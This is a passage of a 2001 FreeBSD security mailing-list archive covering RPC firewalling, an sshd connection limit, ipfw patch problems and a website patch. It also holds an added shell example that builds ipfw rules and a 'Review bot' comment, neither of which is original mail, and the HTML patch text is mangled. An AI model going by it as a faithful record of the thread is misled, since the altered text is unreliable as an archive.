[snip]
> BTW... not that I know of any specific exploits for Rpc.* family servers,

For all RPCs across all architectures? Whoo. That'd be a long list of
well known exploits.

> but I would recommend setting up firewall rules to prevent anyone you
> don't trust from accessing those services (or any other services you
> might be paranoid about).

I wanted to point out that you cannot really 'block' RPC services
effectively with ipfw(8) rules. RPC services do not live on certain
well-known ports[0]. The only way you can effectively block RPC
services is with default deny rules.

This also is problematic if you for some insane reason wished to allow
access to a specific RPC service through a firewall. There is no
single set of ports to open up to let the traffic through. RPC proxies
would be the solution for that case.

[0] The major exception to this is the portmapper which lives at 111
TCP and UDP. It is the one that provides the RPC-number-to-port-number
map, and thus needs to be someplace where you can find it. Another
exception to this rule is NFS which pretty much always lives on 2049
TCP or UDP.

--
Crist J.
Clark
cjclark@alum.mit.edu

From owner-freebsd-security Fri Jan 26 9:52:28 2001
Date: Fri, 26 Jan 2001 18:52:02 +0100 (CET)
From: Gerald Pfeifer
To: Kris Kennaway
Subject: Re: Security Advisories and the Announcements page

So, I now submitted a patch as you had asked, but didn't get any response
at all (and the page has not been updated either). :-(

Gerald

On Thu, 23 Nov 2000, Gerald Pfeifer wrote:
> On Wed, 22 Nov 2000, Kris Kennaway wrote:
>> Can you submit a patch please?
>
> Well, it's really just one line, but here we go. The patch below is for
> .
>
> I intentionally use lower-case HTML tags, as this is what XHTML 1.0 (and
> thus any forthcoming standard) demands and also added a missing full-stop
> in the Java paragraph.
>
> Gerald
>
> --- newsflash.html.1 Tue Nov 14 07:14:14 2000 > +++ newsflash.html Thu Nov 23 02:37:24 2000 > @@ -26,13 +26,16 @@ > subscribe to the freebsd-announce > mailing list.

> > +

For FreeBSD Security Advisories, please refer to the our + href="/security/#adv">Security Information page.

> + >

The FreeBSD Real-Quick (TM) > Newsletter (RQN) is a monthly (sometimes bi-weekly) newsletter > containing recent developments in the FreeBSD arena. Subscribe to > freebsd-announce > to receive this newsletter via e-mail.

> > -

For latest news of FreeBSD Java Project please visit FreeBSD/Java NewsFlash page

> +

For latest news of FreeBSD Java Project please visit FreeBSD/Java NewsFlash page.

> >

For a detailed description of past, present, and future releases, > see the Release > > -- Gerald "Jerry" pfeifer@dbai.tuwien.ac.at http://www.dbai.tuwien.ac.at/~pfeifer/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Jan 26 9:53: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from earth.backplane.com (earth-nat-cw.backplane.com [208.161.114.67]) by hub.freebsd.org (Postfix) with ESMTP id 64A3E37B6A7 for ; Fri, 26 Jan 2001 09:52:18 -0800 (PST) Received: (from dillon@localhost) by earth.backplane.com (8.11.1/8.9.3) id f0QHqDs33135; Fri, 26 Jan 2001 09:52:13 -0800 (PST) (envelope-from dillon) Date: Fri, 26 Jan 2001 09:52:13 -0800 (PST) 
From: Matt Dillon
Message-Id: <200101261752.f0QHqDs33135@earth.backplane.com>
To: Bruce Albrecht
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: weird ssh failure
References: <14961.46979.314273.536660@localhost.zuhause.org>

:I was trying to log onto my FreeBSD box today from work via ssh after
:an ssh session apparently terminated, and for about 5 minutes I was
:getting an error something like "User does not exist! Go away!".
:Since this is not normal behaviour for ssh, does anyone have any idea
:what might have happened? Could someone be doing a man-in-the-middle
:attack on me?
:

    ssh has a really ridiculously low default connections/second limit,
    you might have hit that (or maybe not, I don't get 'user does not
    exist' errors when I overrun it). Look in your /etc/ssh/sshd_config.
    The limit has been depreciated (removed) in -current and -stable,
    but was present in 4.2-REL. Here's what I get:

					-Matt

fire:/home/dillon> ssh earth
(success)
...
fire:/home/dillon> ssh earth
...
fire:/home/dillon> ssh earth
...
fire:/home/dillon> ssh earth
...
fire:/home/dillon> ssh earth
...
fire:/home/dillon> ssh earth
...
fire:/home/dillon> ssh earth
...
fire:/home/dillon> ssh earth
...
fire:/home/dillon> ssh earth
Last login: Fri Jan 26 09:46:52 2001 from fire.emery.backp
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
	The Regents of the University of California.	All rights reserved.

FreeBSD 4.2-STABLE (EARTH) #0: Tue Nov 28 13:15:10 PST 2000

Welcome to FreeBSD!

You have mail.
earth:/home/dillon> logout
Connection to earth.emery.backplane.com closed.
    fire:/home/dillon> ssh earth
    ssh_exchange_identification: Connection closed by remote host
    fire:/home/dillon> ssh earth
    ssh_exchange_identification: Connection closed by remote host
    fire:/home/dillon> ssh earth
    ssh_exchange_identification: Connection closed by remote host
    fire:/home/dillon>

From owner-freebsd-security Fri Jan 26 9:57:50 2001
Date: Fri, 26 Jan 2001 11:51:53 -0600 (CST)
From: Dan Debertin
To:
Cc: David La Croix , "Scot W. Hetzel" ,
Subject: Re: buffer overflows in rpc.statd?
In-Reply-To: <20010126095147.A66394@rfx-216-196-73-168.users.reflex>

On Fri, 26 Jan 2001, Crist J. Clark wrote:
>
> I wanted to point out that you cannot really 'block' RPC services
> effectively with ipfw(8) rules. RPC services do not live on certain
> well-known ports[0]. The only way you can effectively block RPC
> services is with default deny rules.

I've gotten around this in the past by putting 'rpcinfo -p | awk' commands
in rc.firewall, polling the portmapper on protected hosts and then building
firewall rules dynamically for them. It doesn't completely work, because you
have to flush & reload your rules when an NFS server bounces, but for cases
where that's "good enough", it does the job.

~Dan D.

-- 
++ Unix is the worst operating system, except for all others.
++ Dan Debertin
++ Senior Systems Administrator
++ Bitstream Underground, LLC
++ airboss@bitstream.net
++ (612)321-9290 x108
++ GPG Fingerprint: 0BC5 F4D6 649F D0C8 D1A7 CAE4 BEF4 0A5C 300D 2387

From owner-freebsd-security Fri Jan 26 11:13:59 2001
Date: Fri, 26 Jan 2001 11:16:53 -0800
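Dan Debertin's 'rpcinfo -p | awk' approach above, written out as an added shell example (this is not his rc.firewall script): it parses rpcinfo -p output for one protected host and emits ipfw(8) allow rules scoped to a client network, one per distinct protocol/port. The host address 10.0.0.5, the client network 10.0.0.0/24, the rule numbers and the rpcinfo sample are all constructed for the example.

```shell
#!/bin/sh
# Added example (not Dan Debertin's script): build ipfw(8) allow rules from
# `rpcinfo -p` output for one protected host. RPC services bind dynamic ports,
# so these rules go stale when the server bounces; re-run from rc.firewall.
# Host address, client network, rule numbers and sample data are constructed.

# Usage: rpcinfo -p HOST | rpc_to_ipfw HOST CLIENTNET [STARTRULE]
# Emits one "add N allow ..." rule per distinct proto/port, skipping the
# portmapper (port 111), which is fixed and belongs in a static rule.
rpc_to_ipfw() {
    awk -v host="$1" -v clients="$2" -v rule="${3:-2000}" '
        $1 == "program" { next }                  # header line
        NF < 4 { next }                           # blank or malformed line
        $3 != "tcp" && $3 != "udp" { next }       # only protocols ipfw filters
        $4 == 111 { next }                        # portmapper: static rule
        !seen[$3 "/" $4]++ {                      # one rule per proto/port
            printf "add %d allow %s from %s to %s %s in\n",
                   rule, $3, clients, host, $4
            rule += 10
        }'
}

# Constructed sample of `rpcinfo -p` output from an NFS server (10.0.0.5).
SAMPLE_RPCINFO='   program vers proto   port
    100000    2   tcp    111  portmapper
    100000    2   udp    111  portmapper
    100005    1   udp   1023  mountd
    100005    3   tcp   1023  mountd
    100003    2   udp   2049  nfs
    100003    3   tcp   2049  nfs
    100021    1   udp    614  nlockmgr
    100024    1   udp   1013  status'

# Generate rules from the sample. On a real firewall the output would be fed
# to ipfw, e.g.:  rpc_to_ipfw ... | while read r; do ipfw -q $r; done
printf '%s\n' "$SAMPLE_RPCINFO" | rpc_to_ipfw 10.0.0.5 10.0.0.0/24 2000
```

As Dan notes, the generated rules only describe the ports the portmapper reported at the time of the poll; a restarted NFS server can come back on different ports, so the rule set has to be flushed and regenerated.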
From: Kris Kennaway
To: Gerald Pfeifer
Cc: Kris Kennaway , freebsd-doc@freebsd.org, freebsd-security@freebsd.org
Subject: Re: Security Advisories and the Announcements page
Message-ID: <20010126111653.A75150@citusc17.usc.edu>
In-Reply-To: ; from pfeifer@dbai.tuwien.ac.at on Fri, Jan 26, 2001 at 06:52:02PM +0100

On Fri, Jan 26, 2001 at 06:52:02PM +0100, Gerald Pfeifer wrote:
> So, I now submitted a patch as you had asked, but didn't get any response
> at all (and the page has not been updated either).

What's the PR number?

Kris
-- 
NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org

From owner-freebsd-security Fri Jan 26 11:23:18 2001
Date: Fri, 26 Jan 2001 11:26:09 -0800
From: Kris Kennaway
To: Mehmet Hinc
Cc: Justin Stanford , security@FreeBSD.ORG
Subject: Re: ipfw security patch problem..
Message-ID: <20010126112609.C75150@citusc17.usc.edu>
In-Reply-To: <3A718C97.E45FA754@pozitif.net>; from marduk@pozitif.net on Fri, Jan 26, 2001 at 04:41:28PM +0200

On Fri, Jan 26, 2001 at 04:41:28PM +0200, Mehmet Hinc wrote:
> Yup, I`ve heard this problem and I tried to solve it. I copied
> /sys/netinet/ip_fw.h to /usr/include/netine and then I recompiled my
> kernel.

Just for my future reference, were the instructions in the advisory which
tell you to recompile your kernel unclear? Rather a lot of people seem to be
making this mistake.
Kris
-- 
NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org

From owner-freebsd-security Fri Jan 26 11:24:49 2001
Date: Fri, 26 Jan 2001 11:27:52 -0800
From: Kris Kennaway
To: Martin Ibert
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Another problem with the ipfw patch - even bigger hole in the firewall on 4.0R (was: Re: ipfw security patch problem..)
Message-ID: <20010126112752.D75150@citusc17.usc.edu>
In-Reply-To: <5.0.0.25.1.20010126173443.02d9e1e8@pop3.itp.asdis.de>; from mib@asdis.de on Fri, Jan 26, 2001 at 05:36:33PM +0100

On Fri, Jan 26, 2001 at 05:36:33PM +0100, Martin Ibert wrote:
> We also tried to patch a 4.0-RELEASE system. We worked according to the
> step-by-step instructions provided in the advisory. Some patches were
> rejected and had to be done by hand, but apart from that, no major problems
> were discovered during build and install.
>
> However, the resulting combination of kernel and ipfw tool did not work! It
> appears that the firewall took EVERY tcp packet to be part of an
> "established" connection and happily passed setup packets in and out.

I didn't test the patches on 4.0 since that isn't a supported release.. there
have been quite a few other changes to ipfw since 4.0, so chances are there
are other things that need to be patched. Upgrading to 4.2 will be your best
bet for this and future advisories.
Kris
-- 
NOTE: To fetch an updated copy of my GPG key which has not expired, finger kris@FreeBSD.org

From owner-freebsd-security Fri Jan 26 11:30:35 2001
Date: Fri, 26 Jan 2001 20:30:11 +0100 (CET)
From: Gerald Pfeifer
To: Kris Kennaway
Cc: ,
Subject: Re: Security Advisories and the Announcements page
In-Reply-To: <20010126111653.A75150@citusc17.usc.edu>

On Fri, 26 Jan 2001, Kris Kennaway wrote:
> What's the PR number?

I didn't submit a PR but just added the web patch you had asked for to my
response. The mail I sent today had a quote of that original response
including the patch.

Please find an updated patch below.

Gerald

--- newsflash.html.old Thu Jan 25 07:25:13 2001
+++ newsflash.html Fri Jan 26 20:26:11 2001
@@ -33,6 +33,9 @@ see the Release Information page.

+

For FreeBSD Security Advisories, please refer to the our Security Information page.

+

January 2001
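Review bot: the sentence added by this hunk reads "please refer to the our Security Information page", which carries a stray article; it should read "please refer to our Security Information page" before the page is updated. Note also that in this archive copy the two "+" lines show no content at all (the HTML markup was stripped), so the inserted tags cannot be checked from this rendering; the reviewer needs the original mail to confirm that the added markup is well-formed.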